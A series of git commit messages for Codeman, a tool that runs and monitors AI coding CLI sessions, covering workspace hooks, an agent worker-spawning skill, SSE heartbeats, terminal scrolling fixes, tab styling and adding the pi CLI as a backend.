`workspaceHooksEnabled`, default ON, the add-only merge, and the boot sweep of
recovered sessions), and the silent-failure warning. The three cases that stay
hook-less regardless are called out: remote SSH sessions, docker cases that
opted out, and a workspace Codeman cannot write to.
- verbs.md §5.3: the send-and-wait precondition is "the workspace has the hooks
block", not "a case Codeman created".
- endpoints.md: the Signals-by-mode table is now keyed on the setting, with rows
for OFF, for remote/docker-opt-out, and for a session from an older server.
The old create-path grep list becomes a "before 1.18.x" note.
- SKILL.md §2 + the cost list, recipes.md Flow-1 contrast, messaging.md step 1.
"Check, do not assume" is kept and promoted to the load-bearing habit, because
the setting is not visible from the call and a session created by an older server
that has not restarted still has nothing.
The `spawn_worker` hooks grep STAYS: it guards the setting being off, remote
sessions, and older servers. Only its diagnostic changes, since "pick an unused
name" is no longer the fix. That text lives in both the §0 heredoc and
`preamble.sh`, which `test/agent-skill.test.ts` pins byte-identical, so both are
patched with the same bytes.
Docs only, no behavior change. 23 skill tests green, full test:ci 5109 passed.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Installing hooks into any workspace a Claude session runs in is the right
default, but it takes a decision away from a user who deliberately removed
them: nothing on disk distinguishes "removed on purpose" from "never had any",
so they would come back on the next session create.
Adds the synced workspaceHooksEnabled setting (App Settings -> Agents & CLIs ->
Claude), default ON. OFF restores the older behavior exactly: a Codeman hooks
block that is already present is still refreshed when stale (COD-91), but one
is never added.
Every create path routes through one applyWorkspaceHooks() helper so the gate
cannot apply to some paths only, and the boot-time recovery sweep honours it too.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The phone overview and the desktop tab rail list the same sessions, so
they now share one order (CodemanSessionOrder in constants.js, pure and
unit-tested): blocked on you first (longest-blocked at the top), then
running longest-turn-first, then quiet most-recently-quiet first.
The tiebreak flips direction halfway down on purpose: for a state a
session is still in, longer is more urgent; for a state it has stopped
in, more recent is more relevant. The running group keys off the pane's
last Enter (lastSubmitAt), never lastActivityAt, because a working pane
repaints about once a second and would rank every turn as freshly
started. A 0 stamp means "unknown" and sorts last within its state.
The desktop rail was previously in raw tab order. Its number badge stays
the Alt+1..9 index, so on a sorted rail it deliberately no longer runs
1,2,3 downward: it names a shortcut, not a row position. Its second
stamp changes from "active 3m ago" to the state duration the order is
computed from ("created 1d ago . working 40m"), since both working rows
otherwise read "active just now" and the order looked arbitrary.
The tab strip itself is untouched: still user-ordered and drag-sortable.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
A session in a linked case (or any pre-existing repo) ran with no hooks block
at all: writeHooksConfig only fires when Codeman CREATES the case directory,
and refreshStaleCodemanHooks deliberately never adds one. Every hook-driven
surface was therefore dead in exactly the place most sessions run: no tab
alert or phone-overview NEEDS YOU row when a dialog blocks the pane, no
Approvals Inbox item, no push, no definitive stop/idle_prompt for respawn,
and no stop/blocked for the agent wait endpoints.
Both session-create paths and restoreMuxSessions() now call
ensureCodemanHooks(), an add-only merge that keeps a user's own handlers and
leaves a malformed settings file untouched. Claude Code re-reads
settings.local.json, so a session already running in the workspace starts
firing hooks without a restart.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Captured live from an isolated instance running this branch: a regular
active tab beside a yellow waiting-for-input tab and a red needs-decision
tab. The gif covers one full 17.5s loop (LCM of the 2.5s red and 3.5s
yellow pulse cycles), so it loops cleanly.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- SKILL.md: forbid the standalone preamble check and pre-spawn recon turns
(measured: two wasted model turns cost ~12s of a 28s two-worker run; the
hardened flow measured 20.2s cold / 12.8s warm end to end)
- Lineage lines: dip now hangs from the strip's bottom edge (cap 104 -> 64,
no stacked row offsets), fixing the deep bow in wrapped strips and keeping
row-1 arcs off row-2 tab labels; per-child color palette (skin blue first,
then matrix green, pink, violet, red, turquoise, orange) via an inline
--lineage-color custom property
- Session Options -> Session: per-TAB pop-out (open-in-window) button override
on top of the general showTabDetachButton setting; per-device localStorage
map rendered as the tab-show-detach class
- Tab alerts: seed the pending-hook state machine from GET /api/approvals
regardless of the approvals-inbox setting (reloads used to lose the red tab
entirely with the inbox off), clear unconditionally on approval_resolved,
and repaint the alert as a steady red/yellow ring + glow + status dot on a
::before overlay so it stays visible on the selected (active) tab until the
permission is actually resolved
- docs: worker warm-pool design sketch (verified numbers baked in)
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Two live failures from one root cause: Claude Code loads a same-named
user-level skill (~/.claude/skills/codeman, written once by `codeman skill
install`) over the fresh per-case copy, and nothing ever refreshed it. A
stale Aug-9 copy (pre fast-path, pre lineage header) made every agent-driven
spawn run the old recipes: workers spawned serially with pid polls and
without X-Codeman-Parent-Session, so the web UI drew no lineage arcs.
- refreshUserAgentSkill(): session create now refreshes a marker-owned
user-level copy (refresh-only: absent copies are not installed,
foreign/symlink copies stay untouched).
- seedAgentSessionPreamble(): local claude session create pre-seeds the
skill's preamble into ${XDG_CACHE_HOME:-~/.cache}/codeman-agent-<id>.sh,
single-sourced from the new skills/codeman/preamble.sh, so the skill's §0
bootstrap collapses to a two-line loader instead of a ~150-line paste the
model has to type out (measured ~47s of generation per run).
- SKILL.md: §0 now leads with the loader and keeps the full block as the
stale/missing fallback; explicit verbatim-paste warning (a hand-assembled
preamble is how the header and the fast-path functions got lost);
spawn_worker also sends parentSessionId in the body as defense in depth;
preamble stamp bumped to 1.18.3 so pre-fix cached preambles self-heal.
- test/agent-skill.test.ts pins preamble.sh byte-identical to the SKILL.md
heredoc and covers seeding (XDG + HOME fallback, 0600) and the user-level
refresh (absent/stale/foreign).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The changeset ships this as 1.18.2, so the stamp, the bootstrap's grep/write
condition, both re-source guards and the recipes guard all carry 1.18.2 now
instead of a version that would never exist.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Fifteen review findings on the fast-path rewrite plus one caught live, all
verified against a real 1.18.1 server before landing:
- sendwait picks a fresh seq (the epoch second) instead of a fixed 2, so a
second prompt to the same worker is typed instead of silently swallowed as
an already-applied duplicate; explicit seq remains for deliberate resends
- sendwait self-heals stranded delivery: an Ink repaint occasionally eats the
Enter (observed live), so a timed-out short first wait sends one bare \r and
re-waits by resending the identical frame as a tagged duplicate
- spawn_worker verifies the resolved casePath carries Codeman hooks (the same
/api/hook-event marker the server checks), refusing names that resolve to
linked or pre-existing hook-less directories instead of running the job in
what may be the user's real repo
- spawn_worker probes the trust dialog after a short 5s composer wait, not the
full 45s, restoring the ladder staging verbs.md documents; on a readiness
miss it deletes the half-spawned session and returns 1 with empty stdout,
so a prompt can never be typed blind into a trust dialog
- spawn_workers refuses duplicate case names and empty argument lists, and
keys result files by index
- section 1 is bash 3.2 compatible (indexed arrays, no declare -A), prints the
full delivered/timedOut/signal tuple per worker with an explicit line for a
missing result, deletes only workers whose turn really ended (a timeout
means still working), cleans up spawned siblings when any spawn fails, and
guards its mktemp
- last_text takes the previous answer as an optional second argument for
consecutive-turn reads (the transcript briefly serves the prior answer
after a stop, observed live)
- the stale duplicate bullets in section 1's closing list are gone
- reference/verbs.md joins the mode-list drift guard's file list
- README's skill inventory covers verbs.md and the new SKILL.md shape
- the changeset is minor so the shipped release matches the 1.19.0 stamp
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Measured against a live 1.18.1 server, the API does the whole job in about ten
seconds: two cold claude workers spawned and ready in 6.3s, both tasked and both
answers read in 4.0s more. The slowness users reported was agent-side.
Three causes, all of them things the skill taught:
- It taught serial spawning. Nothing in the main document showed `&`/`wait`, so
"spawn two workers" read as "do the readiness ladder twice", which is one model
turn per worker.
- It had no spawn primitive. The happy path had to be reassembled on every run from
where-to-spawn, a four-stage readiness ladder, send-and-wait, the fan-out caveats
and a recipe with two variants. Each is a decision, and most carry a warning.
- It cost ~16k tokens before the first call, at 3.6:1 prose to code, with 25 warning
glyphs and 55 occurrences of "never". A document that is mostly failure modes
teaches caution, and caution bills as thinking tokens.
The preamble now defines the verbs rather than describing them: spawn_worker,
spawn_workers (concurrent), sendwait, last_text. Section 1 composes them into the
whole job in one Bash call and says to stop reading there.
Two ceremonies the measurements retired: the pid poll (one iteration, 33ms, and
wait-output already blocks on the composer) and reading settings.local.json to check
hooks for a case quick-start creates, which always has them. That check stays
required for linked cases and raw paths, where its absence silently breaks
send-and-wait.
The bootstrap's write condition now greps the version stamp, so a stale or truncated
preamble self-heals rather than failing and asking for a manual rm. The stamp line is
kept bare because the grep anchors on it with $; an inline comment there would rewrite
the file on every bootstrap.
Section 5 moved to reference/verbs.md behind an index, cutting the always-paid
SKILL.md from ~16.4k to ~7.6k tokens. Section numbers and anchor slugs are unchanged,
so existing references still resolve; all 201 anchors across the five files were
checked, with the checker positive-controlled against an injected bad link.
Verified by extracting the code blocks from the shipped file and running them against
the live server: bootstrap plus full fast path, two workers resolving on the
definitive stop signal, answers read and sessions deleted, in 6.8s.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Follow-up to #285. Violet sits close to the terminal's own dim foreground,
so the arcs lost contrast exactly where they cross text, which is most of
their length. Blue reads at a glance on the dark skins and on the light
ones.
Colour still comes from a token every skin block already defines and tunes
for its own background (--session-blue instead of --session-purple), so it
stays one rule for all seven skins with no per-skin override, and the two
blues are not even the same: --session-blue is per palette while the
subagent rule hardcodes #3b82f6.
Hue no longer separates this layer from the subagent lines, so the
separation now rests entirely on shape (a lineage arc hangs under the strip
and never reaches a window), weight and dash pattern. Noted in the rule.
CSS only: no geometry, no markup, no settings.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The refresh can now issue two fetches (full history, then the tail as a
downgrade fallback), which widens an existing window where the user switches
tabs mid-flight and this session's history gets painted into the terminal they
are now looking at. Guard it the way _maybeRefetchFullHistory already does.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Two further instances of the same root cause, both in _onSessionNeedsRefresh,
which is SERVER-triggered (it fires after SSE backpressure clears) so the user
has no gesture to blame the result on.
1. It ended in an unconditional scrollToBottom, so a user quietly reading
scrollback was dropped to the live output by a background event. It now
holds their place. The rewrite REPLACES the buffer, so an absolute viewportY
captured beforehand is meaningless afterwards; distance from the bottom is
the anchor that survives, via computeRewriteScrollLine().
2. It rebuilt the terminal from a 1MB TAIL. Measured end to end on a 900-line
shell pane: an 869-row buffer came back as 158 rows, so the refresh meant to
REPAIR the display was destroying most of the scrollback every time it ran.
It now asks for full history, and falls back to the tail only when
_replayWouldShrinkBuffer refuses the capture, which keeps repaint-mode panes
(tmux holds roughly one frame for them) exactly as they were.
Also records truncation state here, so the #258 banner stops describing the
pre-refresh buffer.
Verified in a real browser against a live session: baseY 869 -> 869 where it
used to be 869 -> 158, a reader 200 lines up stays 200 lines up, and a follower
stays pinned to the bottom.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The lines that join a tab to the workers its codeman skill spawned were
drawn with numbers tuned against two tabs sitting side by side, and they
degraded in exactly the two situations the feature is actually used in.
1. A spawned worker is appended to the END of the strip, so the real span
between a lead and its worker is 800-1500px. With the dip clamped at
44px that is a 33px sag: the arc reads as a straight line drawn across
the terminal instead of a bracket hanging under the strip. The dip now
grows at 0.085/px and clamps at 104.
2. When the desktop strip wraps (tabs-two-rows / tabs-auto-wrap), a parent
on row 1 and its child on row 2 are ~14px apart, and the cross-row
branch drew parent-bottom to child-TOP: a flat line hidden inside the
row gap, with siblings overprinting each other. Both ends now anchor on
the tab BOTTOM with the control points below the LOWER row, so a wrapped
pair gets the same bracket a flat strip gets. That deletes the branch:
one shape covers both.
Visibility, at 1:1 rather than in a zoomed mockup: 2 -> 2.5px stroke,
4 4 -> 5 5 dashes (lineage-flow moves with them, -16 -> -20), opacity
.55 -> .72, and a second wider glow so the contrast comes from the halo
rather than from more weight, keeping the line under the subagent lines'
3px. A working child is bright (.95) outside the reduced-motion block, so
turning motion off no longer also dims every worker's arc. Sibling nesting
6 -> 8px and the direction dot 3 -> 3.5px to match the heavier stroke.
Verified at 1:1 in a harness driving the real styles.css and the real
computeLineagePath over three layouts (adjacent workers, workers at the
far end of a full strip, wrapped two-row strip) on a dark and a light
skin. test/session-lineage-lines.test.ts pins both regressions.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Two bugs in the File Viewer's media player, both reproduced in a real
browser against an 18MB mp4 before and after the fix.
1. Closing the preview left the video playing. closeFilePreview() only
dropped the overlay's `visible` class, which is display:none and
nothing else, so the audio kept going with no visible player to pause.
Detaching the element is not a fix either: a detached HTMLMediaElement
plays on until it is garbage collected. _stopFilePreviewMedia() now
pauses, drops src and load()s every media element (also on re-open,
where overwriting innerHTML had the same effect), which additionally
aborts the in-flight download.
2. The scrub bar was inert. file-raw read the whole file and answered
200 with no Accept-Ranges, so Chrome reported video.seekable as
[0, 0] and silently reverted `currentTime = x`; Safari refuses to
start such media at all. Raw bodies are now streamed and range-aware:
Accept-Ranges: bytes on every response, 206 + Content-Range for a
Range request, 416 for one past EOF, and a malformed spec ignored
(200) per RFC 9110. Parsing is pure in src/web/http-range.ts.
Measured on tmp/codeman-crt-v5-66s.mp4 (18MB, 66.6s):
before seekable [0, 0] seek to 56.6s reverted to 3.9s close: still playing
after seekable [0, 66.56] seek to 56.6s landed at 60.2s close: paused, NETWORK_EMPTY
Range slices are byte-identical to `dd`, the full-file path is
byte-identical to the file, and the SVG octet-stream/attachment
hardening and the 50MB cap are unchanged (the cap is still checked
before the range).
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Four documentation defects found while analysing the agent skill against the
code it drives.
The lineage section attributed "deletes its session as soon as the one-shot
prompt returns" to `POST /api/v1/sessions/:id/run`. That is true of
`POST /api/v1/run`, which creates a throwaway session and calls cleanupSession
on both the success and the error path; the per-session route deletes nothing.
Name the right endpoint, and give the real reason the per-session one carries
no lineage: it is not a create call.
While verifying that, the per-session route turned out to be a sharper trap
than documented. `runPrompt()` rejects whenever a PTY already exists, which is
every interactive session, but the route has already returned `{}` with HTTP
200 by then and routes the rejection only to SSE. An agent calling it against
a live worker reads the 200 as delivery. Document it.
`Flow 3b` never existed in recipes.md. The real mapping is Flow 3 = shell
fan-out, Flow 4 = claude fan-out, Flow 5 = worker blocked on a prompt, so the
same sentence was also mislabelling Flow 4. Fixed in SKILL.md and in the
endpoints.md reference to it; every other Flow reference audited and correct.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Closes#259, closes#258. Both bottom out in the same gap: nothing tracked
whether the user was following live output or reading history.
#259 — the keyboard path forced the terminal to the bottom unconditionally
(onKeyboardShow/onKeyboardHide passed scrollToBottom:true, applied with no
check), so opening the keyboard while scrolled up yanked the user down. The
settle cycle now captures intent on its FIRST event, before any fit() has
reflowed the buffer, and returns to that anchor when the user was reading.
A later capture would read an already-moved viewportY, which is why the
capture point matters. The param is renamed restoreScroll to match.
Separately, flushPendingWrites gated viewport preservation on
_hasRecentUserScrollUp(), a 1500ms decay window, so a user who scrolled up and
then actually READ for longer lost protection mid-read. Being scrolled up IS
the intent however long ago it was expressed, so it now keys off position.
The recency window stays as a race guard on the sticky scroll-to-bottom.
The full-history repull already held the user's place and is unchanged.
#258 — truncation was reported by a grey line written INTO the terminal
("earlier output truncated"), which scrolls away with the output it describes,
cannot be acted on, and said the same thing whether the rest was one click away
or gone forever. The server set one `truncated` boolean at two sites meaning
opposite things, and the client discarded fullSize and source entirely.
The route now reports truncationReason ('tail' = intentional partial replay,
the rest is retained; 'capped' = the byte ceiling dropped it) plus
retainedBytes, and 'capped' is not downgraded by a later tail cut. The client
renders a dismissible banner outside terminal output with three honest states:
recoverable (offers Load full history), at-ceiling, and exhausted. The Load
button forces past the scroll cooldown but NOT past _replayWouldShrinkBuffer,
which still refuses a downgrade for repaint-mode panes.
The banner is an overlay, not a flex child: FitAddon derives rows/cols from the
terminal parent's computed height, so occupying real layout space would SIGWINCH
the CLI on every truncation-state change.
Verified in a real browser on the 7 skins: banner text and button clear 4.5:1
contrast on all of them, and terminal height is byte-identical with the banner
shown. The first cut used --bg-elevated and --accent-muted, which do not exist,
so light skins rendered a hardcoded dark bar under dark text; it now uses only
tokens every skin redefines.
test/terminal-scroll-intent.test.ts lives outside test/mobile/ deliberately —
that suite is excluded from test:ci, so a guard placed there is invisible to CI.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
PR #282 added pi across the prominent surfaces but left the enumerations
that read as exhaustive: the env-prefix allowlist (missing PI_*), the
external-CLI list for stop/blocked, cron's agent types (also missing
antigravity), the narrow-strip mode list, and the claude-only caveats in the
cron and Read My Mind guides. Both READMEs and the four affected docs now agree
with the schema.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Heal a stalled SSE stream: the server's :keepalive comment becomes a named
sse:heartbeat event (comments are invisible to EventSource by spec), and the
client gains a staleness watchdog that forces a reconnect after three missed
beats. Also applies a confirmed rename locally instead of waiting on SSE.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
`GET /api/pi/status` shipped undocumented in the agent skill, and only a human
reading the doc noticed. Turns out none of its five siblings were documented
either, so this adds the whole family in one place: spawning with a mode whose
CLI is absent fails with OPERATION_FAILED rather than falling back, which is
exactly what an agent picking a backend it did not choose needs to know. Pi's
extra `.data.version` is called out, since a false `available:false` there means
an unrelated `pi` is in front on PATH.
On whether the endpoint scanner should also check registered-to-documented:
measured, and NO for the general case. The skill documents 34 of 217 registered
endpoints deliberately (it is an agent guide, not an API reference), so a blanket
reverse check needs a 183-entry allowlist that would fail CI on unrelated route
work and get appended to mechanically, which is worse than the gap it closes.
Grouping by path shape does not save it either: the families that yields are
things like `DELETE /api/<any>/:id`, lumping cases, webviews and docker hosts
together, and it would not have caught this gap anyway (the family had zero
documented members).
What IS cheap is a family the schema can enumerate with no allowlist: the new
assertion derives the agent modes from the Zod enum and requires each one's
`/api/<mode>/status` to be documented, so a seventh backend fails here until it
is. The sibling scanner still proves the other direction, that nothing documented
is a 404. Both mutation-checked: dropping pi's probe fails the new guard, and
documenting a nonexistent probe fails the old one.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Second review pass on #282, the three items left open after f4dcfbe.
1. `codeman doctor` and the run mode disagreed about pi. The registry entry
accepted a bare `which pi` hit while pi-cli-resolver demanded semver-shaped
`--version` output, so the Dependencies panel could report an installed Pi CLI
on a box where Run Pi stays hidden, which reads as a broken mode rather than a
missing install. Both sides now share one exported PI_VERSION_REGEX, and
PathResolver gains an opt-in `requireVersionMatch` so a binary that fails the
shape check is reported MISSING instead of installed-with-unknown-version.
Only pi sets it; every other tool keeps its current behaviour.
2. The isAltScreenStripMode comment justified excluding pi with "the alt screen
is load-bearing for its fullscreen TUI". That is not what exclusion does: pi
is tmux-backed, so it falls through to isMuxAltScreenOnlyStripMode, which
strips the alt-screen toggles anyway. What exclusion actually preserves is
`\x1b[3J` and the mouse DECSETs, which is the real reason (pi renders into the
main screen and is mouse-aware). Comment and changeset now say that, and state
the consequence: fullscreen pi paints into the main buffer, like vim in a tmux
shell session.
3. skills/codeman still enumerated the five pre-pi modes in nine places, telling
agents a backend does not exist and understating class-wide caveats by one
mode. All updated, plus stale session.ts line references refreshed.
Tests: a new static guard derives the mode set from the Zod schema (not a copy)
and fails when a skill enumeration lists a partial set of external CLIs, verified
by mutation. It also documents the one legitimate exception it found: the "writes
no transcript" lists drop codex, which does write a rollout Codeman reads back.
Plus doctor cases for an unrelated `pi` on PATH and registry/resolver regex parity.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
An EventSource that stops delivering does not always error. A proxy that
idle-closed the connection, a laptop resumed from sleep, a tailnet reconnect:
`onerror` never fires, the header dot stays green, and every SSE-driven surface
(tab status dots, sessions created on another device, renames) freezes until the
user reloads. Nothing on the client tracked stream liveness at all.
The server already wrote a keepalive every 15s, but as an SSE `:keepalive`
COMMENT, and comments are invisible to `EventSource` by spec, so there was
nothing a client could observe.
Server:
- `sse:heartbeat` under a new Transport category in the event registry
(155 constants now, both counts updated).
- `cleanupDeadClients()` writes that named frame (`{"t":<epoch ms>}`) instead of
the comment. Interval, tunnel padding and dead-socket eviction are unchanged.
The write stays per-client rather than going through `broadcast()`: the frame
carries no session data, so it needs no multi-user owner routing.
Client:
- `computeSseStale()` in constants.js, a pure policy beside
`computeConnectionLossUi`. Stale only when the transport believes it is
`connected`, the device is online, and no frame has arrived for 45s (three
missed heartbeats). The `connected`-only guard is also the loop breaker: a
forced reconnect leaves that state immediately, so the watchdog cannot re-fire
while one is in flight.
- The liveness stamp is applied inside `addListener` itself, so the
`_SSE_HANDLER_MAP` wrappers and the directly-registered listeners all feed it
from one place instead of three that can drift. The heartbeat's own listener
is a no-op that exists only to be registered, since `EventSource` drops named
events nobody listens for.
- A 5s watchdog forces `connectSSE()` when the policy says stale, and is cleared
at the top of `connectSSE()` and nowhere else (its only teardown path).
Recovery needs no new sync path: the reconnect re-runs `handleInit`, which
already rebuilds from the server. `visibilitychange` -> visible checks too,
riding the existing listener, since a background tab's timers are throttled
and a wake is exactly when a stream comes back zombie.
- The forced reconnect logs one diagnostic line: if a middlebox ever strips or
delays heartbeats, the failure mode is "silently reconnects every 45s", which
is undebuggable from a field report without it.
Tests: `test/sse-staleness.test.ts` (node VM over constants.js, threshold
boundaries and every not-stale guard) and `test/sse-heartbeat.test.ts` (drives
`cleanupDeadClients()` with fake replies: named frame not a comment, parseable
payload, padding only with a tunnel, dead clients still evicted).
Verified end to end on an isolated instance: with the stream closed client-side
(no `onerror`), a rename sticks, an out-of-band session stays invisible, then
the watchdog reconnects on its own and it appears without a reload.
Event names are part of the stable API contract, so this is a MINOR bump.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Review follow-ups on #282. All four are the same failure shape: a list that
enumerates run modes, missed by the sweep that added 'pi'.
1. Cron ignored pi's project-trust clamp. The PR widened CronJobBaseSchema's
agentType to accept 'pi' but not the matching clamp beside gemini's, so a
non-granted multi-user owner's cron pi job spawned bare `pi` (pi's own
defaultProjectTrust, an interactive prompt they can answer "yes" to, which
loads and EXECUTES repo-local .pi/extensions TypeScript) while the same
user's UI/API launch was forced to --no-approve. The clamp is now a pure
exported helper, clampCronExternalCliConfigs(), so both it and gemini's
previously untested materialization are pinned.
2. POST /api/sessions/:id/interactive auto-enabled the Ralph tracker for pi:
its denylist covered opencode/codex/gemini/antigravity only. The tracker is
never fed for an external CLI (_processExpensiveParsers returns early), so a
pi session reported ralphEnabled and Ralph UI state no sibling backend shows.
3. REMOTE_CLI_BIN had no pi entry, so buildRemoteCliVersionProbeCommand()
returned null and Session.cliVersion stayed blank for every remote-SSH pi
session, even though the PR wired the remote launch command and the
per-mode override schema field.
4. The desktop home rail's badge map had no pi entry, and its lookup falls back
to '', which is what claude renders. A pi session read as Claude there while
the tab strip and phone overview badged it correctly.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Renaming a tab appeared to do nothing: the new name only showed after a full
page reload. The PUT always succeeded; what was broken is how the tab strip
learns the result. `finishRename()` re-renders the strip from the client-side
`app.sessions` map, and nothing wrote the new name into that map, so the rename
depended on the `session:updated` SSE frame to carry its own write back. On a
page whose stream has gone quiet without erroring, that frame never lands and
the re-render repaints the stale label.
- `_applyLocalSessionName()` writes the confirmed name into `this.sessions` and
refreshes cached subagent parent names, mirroring `_onSessionUpdated`.
- `_putSessionName()` returns the stored name or null. `_apiPut` turns a network
error into a null Response and an API failure into a non-ok status, so a
rejected rename previously read as success and silently dropped the edit (the
old try/catch could never fire).
- Both surfaces use them: `startInlineRename()`'s `finishRename` and
`saveSessionName()`.
Two regression tests: the commit applies the name with no SSE frame dispatched,
and a 500 restores the old label, leaves the map untouched, and toasts.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
SessionMode gains 'pi', a first-class backend alongside Claude Code,
OpenCode, Codex, Gemini and Antigravity: its own PTY, tmux session, rose
tab identity, welcome button, run-mode entry, cron agentType, Docker and
remote-SSH command defaults, and clone-repo Brain option.
Pi is a different shape of CLI from the other four, and three decisions
follow from that:
- It has NO permission prompts and no sandbox, so there is no
--dangerously-skip-permissions analog and none was invented. The
privilege-shaped knob is the tri-state approveProjectTrust, which makes
pi load and EXECUTE repo-local .pi/extensions TypeScript and install
missing project packages. clampExternalCliBypassForOwner() therefore
puts pi in the MATERIALIZE branch: a non-granted multi-user owner gets
--no-approve even when no config was sent, because pi's own default is
a prompt the session user could answer themselves. That helper had zero
test coverage; it now has coverage for all four CLIs.
- Only the PI_ prefix joins the env allowlist. Pi's ~34 provider key vars
share no prefix and ALLOWED_ENV_PREFIXES is one global list with no mode
context, so admitting them would widen the allowlist for every mode at
once. Auth goes through pi's /login or the server's own environment.
--api-key is deliberately never wired: it would put a provider secret on
the spawn command line.
- pi stays OUT of isAltScreenStripMode(). Its default TUI renders into the
main screen with terminal-owned scrollback, and its 0.84.0 fullscreen
mode is runtime-switchable via /settings; that flip was measured to put
the pane into the alt screen, which the strip would have corrupted.
pi-cli-resolver.ts additionally sanity-probes `pi --version` and requires
semver-shaped output, because `pi` is a short generic name a stray binary
can shadow; GET /api/pi/status surfaces path and version so a
misresolution is diagnosable rather than presenting as a broken mode.
Docker installs pi in its own --ignore-scripts step so that flag cannot
affect the other four CLIs, and seeds its credentials per-file rather than
whole-dir (~/.pi/agent also holds sessions, extensions and package trees).
Verified end to end against pi 0.84.1 on an isolated instance: resolver
search-dir fallback, flag construction, piConfig persistence across a full
server restart, the trust prompt and its --no-approve suppression, the
rose Run button on the default daylight-blue skin (the nested skin block
eats per-mode gradients unless the rule lives inside it), and the buffer
local-echo policy, which pi tolerates where codex did not.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Release 1.16.6: phone overview started/idle stamps, plus fixes for the
selection-dialog keyboard lockout, the accessory bar arrows bypassing the
local-echo overlay, and recovered sessions being restamped as newly created
on every server restart.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Below 860px Save moves into the header (a bottom action bar would cost 60px
of a phone sheet), which left the two ways OUT of the sheet sitting side by
side in mismatched shapes: a fat accent pill next to a bare 1.5rem glyph
with no box at all. They are the same decision (save-and-close vs
discard-and-close), hit in the same corner with the same thumb, so they now
share a recessed tray and matching pill geometry and read as one cluster.
- 36px on both, so the tray comes out at 44px including its 3px padding and
1px border — the same height as the phone header it sits in.
- `.modal-close` gets a real box (36x36, radius 9) only inside the tray; its
bare-glyph form is still right in a plain modal header.
- Tray colors come from skin tokens (--border/--bg-input). A hardcoded black
alpha would render as a grey slab on the four light skins, the same trap
the layout preview frame hit.
- `:has(.set-head-save)` keeps the tray off the sheets that carry a lone x:
Session Options and Add Case save from inside their own forms.
- The shared focus ring offsets OUTWARD, which inside the tray would draw on
top of the tray border, so it is inset to ring the button instead.
DOM order stays close-then-save so the focus trap still lands on Close;
row-reverse paints Save to its left.
Verified at 390x844: tray 44px tall, Save 36px, Close 36x36, both radius 9
inside a 12-radius tray. PostCSS-parsed (prettier does not catch an unclosed
CSS block, and styles.css is prettier-ignored by design).
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
#279 and #280 auto-merge cleanly, but the merged result was red: neither
branch could see the other, and CI cannot see either, because the only test
covering #279 lives in test/mobile/** which test:ci excludes.
Two problems, both in #279's test:
1. The in-terminal case tapped the terminal's top-left corner, i.e. an inert
transcript row, and asserted focus was retained. That is precisely the
gesture #280 redefines, so #280 turned it red. Aim it at the PROMPT row
instead: the one in-terminal tap whose outcome neither PR claims, so it
still proves the #terminalContainer exemption without asserting the
toggle's behaviour.
2. The "a real control is exempt" case was VACUOUS. It picked the first
button measuring >8px, which is .welcome-ralph-link inside the welcome
overlay hideWelcome() had already hidden: the rect still measures, but
elementFromPoint at that point returns .xterm-screen, so the case tapped
the TERMINAL and passed for the wrong reason. It only surfaced because
#280 changed what a terminal tap does. Require the sampled point to
actually resolve to the button, and fail loudly when no control is
usable rather than silently asserting nothing.
Mutation-checked: removing the install, the #terminalContainer exemption,
the control exemption or the `if (moved) return` scroll guard each turns
the test red on its own. The control exemption had no coverage before.
Also fold the duplicated tap slop into one constant: initTerminal's
TAP_THRESHOLD now reads MOBILE_KEYBOARD_DISMISS_TAP_SLOP instead of
re-declaring 8, since a drift between them is exactly the bug the second
#279 commit fixed. And restore the comment the slop constant was inserted
into the middle of, which left "Regions where a tap must NOT dismiss"
sitting above the slop rather than the selector it documents.
test/mobile/keyboard.test.ts: 5 failed | 47 passed (52). Master is
5 failed | 46 passed (51) — the same five pre-existing failures.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Every terminal tap re-focuses the hidden textarea, so once the on-screen keyboard
is open the only way to close it is the accessory bar's dismiss chevron. Tapping
the transcript to get the screen back is the obvious gesture and it did nothing.
A tap on INERT content with the keyboard already up now dismisses it. Nothing
else claims that gesture: an inert row has no action to trigger, so by that point
the tap has already done its only other job (the mouse report).
Scoped to 'content' ON PURPOSE. The prompt row ('input') keeps
focus-then-position, so a second tap there still places the caret — that is real
capability and trading it away would be a worse deal than the bug. A separate
test pins it rather than leaving it to the reader.
Actionable rows are unchanged: readbacks, "esc to interrupt" status rows and menu
selections still blur via _isActionableMobileTerminalTap, which runs first.
`keeps the hidden keyboard input focused after an inert Claude transcript tap`
asserted the OLD behaviour and is renamed and inverted, since revising that
behaviour is the point of this change. Its setup already focused the terminal
before tapping, so it was always exercising the second-tap case.
test/terminal-touch-tap.test.ts: 28 tests. The two new ones fail on master —
`closes the keyboard on a second tap of INERT transcript content` behaviourally,
by asserting blur where master re-focuses.
